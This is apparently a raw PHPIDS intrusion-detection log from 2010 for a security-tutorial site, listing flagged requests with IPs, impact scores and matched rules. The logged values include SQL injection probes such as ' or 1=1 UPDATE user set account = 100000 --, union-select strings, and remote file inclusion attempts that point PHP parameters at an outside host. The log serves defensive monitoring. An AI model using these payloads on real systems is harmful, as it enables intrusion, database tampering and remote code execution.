Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122508
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:11:55
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122499
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:09:26
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122500
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:09:26
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122501
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:09:26
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122502
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:09:26
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122497
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:09:24
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122498
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:09:24
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122491
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:08:38
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122492
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:08:38
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122493
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:08:38
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122494
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:08:38
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122495
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:08:38
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122496
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:08:38
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122489
Name:REQUEST.page
Value:videos/keyllama-<acronym title=
Page:/i.php?page=videos/keyllama-%3Cacronym%20title=
IP:74.205.116.38
Impact:8
Created:2010-04-25 04:34:37
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122490
Name:GET.page
Value:videos/keyllama-<acronym title=
Page:/i.php?page=videos/keyllama-%3Cacronym%20title=
IP:74.205.116.38
Impact:8
Created:2010-04-25 04:34:37
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122487
Name:REQUEST.mode
Value:/*
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10&mode=/*
IP:74.205.116.38
Impact:6
Created:2010-04-25 04:30:23
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122488
Name:GET.mode
Value:/*
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10&mode=/*
IP:74.205.116.38
Impact:6
Created:2010-04-25 04:30:23
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122485
Name:REQUEST.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking%20network%20printers%3C/a%3E%0A%09by%20northpole%3Cbr%3E%0A%09%3Ca%20href=
IP:74.205.116.38
Impact:8
Created:2010-04-25 04:26:35
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122486
Name:GET.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking%20network%20printers%3C/a%3E%0A%09by%20northpole%3Cbr%3E%0A%09%3Ca%20href=
IP:74.205.116.38
Impact:8
Created:2010-04-25 04:26:35
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122483
Name:REQUEST.codeme
Value:' or 1=1 UPDATE user set account = 100000 --
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:85.199.36.15
Impact:54
Created:2010-04-25 04:04:15
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122484
Name:POST.codeme
Value:' or 1=1 UPDATE user set account = 100000 --
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:85.199.36.15
Impact:54
Created:2010-04-25 04:04:15
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122481
Name:REQUEST.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0D%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0D%0A%0D%0A%09%09%09%09%20%20%20%20%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-04-25 02:16:25
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122482
Name:GET.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0D%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0D%0A%0D%0A%09%09%09%09%20%20%20%20%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-04-25 02:16:25
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122477
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=21879519&CFTOKEN#=22657721#lastvisit={ts '2010-04-24 13:13:02'}#timecreated={ts '2010-04-24 13:13:02'}#hitcount=2#cftoken=22657721#cfid=21879519#
Page:/i.php?pagesecurity/louisv
IP:206.251.250.194
Impact:64
Created:2010-04-25 00:51:08
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:122478
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=21879519&CFTOKEN#=22657721#lastvisit={ts '2010-04-24 13:13:02'}#timecreated={ts '2010-04-24 13:13:02'}#hitcount=2#cftoken=22657721#cfid=21879519#
Page:/i.php?pagesecurity/louisv
IP:206.251.250.194
Impact:64
Created:2010-04-25 00:51:08
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:122479
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=21879519&CFTOKEN#=22657721#lastvisit={ts '2010-04-24 13:13:02'}#timecreated={ts '2010-04-24 13:13:02'}#hitcount=2#cftoken=22657721#cfid=21879519#
Page:/
IP:206.251.250.194
Impact:64
Created:2010-04-25 00:51:08
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:122480
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=21879519&CFTOKEN#=22657721#lastvisit={ts '2010-04-24 13:13:02'}#timecreated={ts '2010-04-24 13:13:02'}#hitcount=2#cftoken=22657721#cfid=21879519#
Page:/
IP:206.251.250.194
Impact:64
Created:2010-04-25 00:51:08
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:122475
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=21879519&CFTOKEN#=22657721#lastvisit={ts '2010-04-24 13:13:02'}#timecreated={ts '2010-04-24 13:13:02'}#hitcount=2#cftoken=22657721#cfid=21879519#
Page:/i.php?pagesecurity%2Floui
IP:206.251.250.194
Impact:64
Created:2010-04-25 00:51:07
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:122476
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=21879519&CFTOKEN#=22657721#lastvisit={ts '2010-04-24 13:13:02'}#timecreated={ts '2010-04-24 13:13:02'}#hitcount=2#cftoken=22657721#cfid=21879519#
Page:/i.php?pagesecurity%2Floui
IP:206.251.250.194
Impact:64
Created:2010-04-25 00:51:07
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:122473
Name:REQUEST.page
Value:zaurusmain?lastverified=07-MAR-2004
Page:/i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004
IP:67.195.111.36
Impact:10
Created:2010-04-25 00:08:05
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122474
Name:GET.page
Value:zaurusmain?lastverified=07-MAR-2004
Page:/i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004
IP:67.195.111.36
Impact:10
Created:2010-04-25 00:08:05
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122472
Name:GET.page
Value:backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
Page:/i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
IP:216.129.119.40
Impact:10
Created:2010-04-24 23:46:58
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122471
Name:REQUEST.page
Value:backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
Page:/i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
IP:216.129.119.40
Impact:10
Created:2010-04-24 23:46:57
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:122469
Name:REQUEST.id
Value:'
Page:/?id='
IP:84.38.67.248
Impact:12
Created:2010-04-24 21:27:56
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122470
Name:GET.id
Value:'
Page:/?id='
IP:84.38.67.248
Impact:12
Created:2010-04-24 21:27:56
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122467
Name:REQUEST.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking%20network%20printers%3C/a%3E%0A%09by%20northpole%3Cbr%3E%0A%09%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-04-24 20:29:52
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122468
Name:GET.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking%20network%20printers%3C/a%3E%0A%09by%20northpole%3Cbr%3E%0A%09%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-04-24 20:29:52
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122465
Name:REQUEST.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 19:55:16
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122466
Name:GET.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 19:55:16
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122463
Name:GET.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:26
Created:2010-04-24 19:46:23
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122464
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 19:46:23
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122461
Name:REQUEST.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:26
Created:2010-04-24 19:46:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122462
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 19:46:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122459
Name:REQUEST.page
Value:security/hackingillustrated' and 1=2 and ''='
Page:/i.php?page=security/hackingillustrated'%20and%201=2%20and%20''='
IP:118.182.22.9
Impact:46
Created:2010-04-24 17:52:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122460
Name:GET.page
Value:security/hackingillustrated' and 1=2 and ''='
Page:/i.php?page=security/hackingillustrated'%20and%201=2%20and%20''='
IP:118.182.22.9
Impact:46
Created:2010-04-24 17:52:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122457
Name:REQUEST.page
Value:security/hackingillustrated' and 1=1 and ''='
Page:/i.php?page=security/hackingillustrated'%20and%201=1%20and%20''='
IP:118.182.22.9
Impact:46
Created:2010-04-24 17:52:15
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122458
Name:GET.page
Value:security/hackingillustrated' and 1=1 and ''='
Page:/i.php?page=security/hackingillustrated'%20and%201=1%20and%20''='
IP:118.182.22.9
Impact:46
Created:2010-04-24 17:52:15
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122455
Name:REQUEST.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:200.188.241.109
Impact:20
Created:2010-04-24 15:42:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122456
Name:GET.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:200.188.241.109
Impact:20
Created:2010-04-24 15:42:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122454
Name:GET.page
Value:security/hackingillustrated and 0=1 union select
Page:/i.php?page=security/hackingillustrated+and+0=1+union+select+
IP:200.188.241.109
Impact:20
Created:2010-04-24 15:42:22
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122453
Name:REQUEST.page
Value:security/hackingillustrated and 0=1 union select
Page:/i.php?page=security/hackingillustrated+and+0=1+union+select+
IP:200.188.241.109
Impact:20
Created:2010-04-24 15:42:21
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122451
Name:REQUEST.page
Value:videos/footprinting-scoping-an …/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/footprinting-scoping-an%20%E2%80%A6/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 14:29:54
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122452
Name:GET.page
Value:videos/footprinting-scoping-an …/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/footprinting-scoping-an%20%E2%80%A6/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 14:29:54
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122447
Name:REQUEST.page
Value:videos/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 14:21:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122448
Name:GET.page
Value:videos/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 14:21:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122449
Name:REQUEST.page
Value:videos/footprinting-sco...ogle-hacking-and-metadata /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/footprinting-sco...ogle-hacking-and-metadata%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 14:21:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122450
Name:GET.page
Value:videos/footprinting-sco...ogle-hacking-and-metadata /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/footprinting-sco...ogle-hacking-and-metadata%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 14:21:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122445
Name:REQUEST.page
Value:videos/footprinting-scoping-an …/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/footprinting-scoping-an%20%E2%80%A6/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 14:01:29
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122446
Name:GET.page
Value:videos/footprinting-scoping-an …/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/footprinting-scoping-an%20%E2%80%A6/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 14:01:29
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122441
Name:REQUEST.page
Value:videos/footprinting-sco...ogle-hacking-and-metadata /modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/footprinting-sco...ogle-hacking-and-metadata%20%20/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 13:54:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122442
Name:REQUEST.page
Value:videos/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 13:54:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122443
Name:GET.page
Value:videos/footprinting-sco...ogle-hacking-and-metadata /modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/footprinting-sco...ogle-hacking-and-metadata%20%20/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 13:54:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122444
Name:GET.page
Value:videos/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
Page:/i.php?page=videos/modules/My_eGallery/index.php?basepath=http://phamsight.com/docs/images/head??
IP:66.221.63.33
Impact:20
Created:2010-04-24 13:54:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122439
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=videos/myslax
Page:/i.php?page=security/hackingillustrated/i.php?page=videos/myslax
IP:96.31.86.184
Impact:10
Created:2010-04-24 12:21:34
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122440
Name:GET.page
Value:security/hackingillustrated/i.php?page=videos/myslax
Page:/i.php?page=security/hackingillustrated/i.php?page=videos/myslax
IP:96.31.86.184
Impact:10
Created:2010-04-24 12:21:34
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122437
Name:REQUEST.page
Value:security/networkprinterhacking and 1=0 union select 1,2/*
Page:/i.php?page=security/networkprinterhacking+and+1=0+union+select+1,2/*
IP:87.99.108.101
Impact:26
Created:2010-04-24 10:01:46
Details:
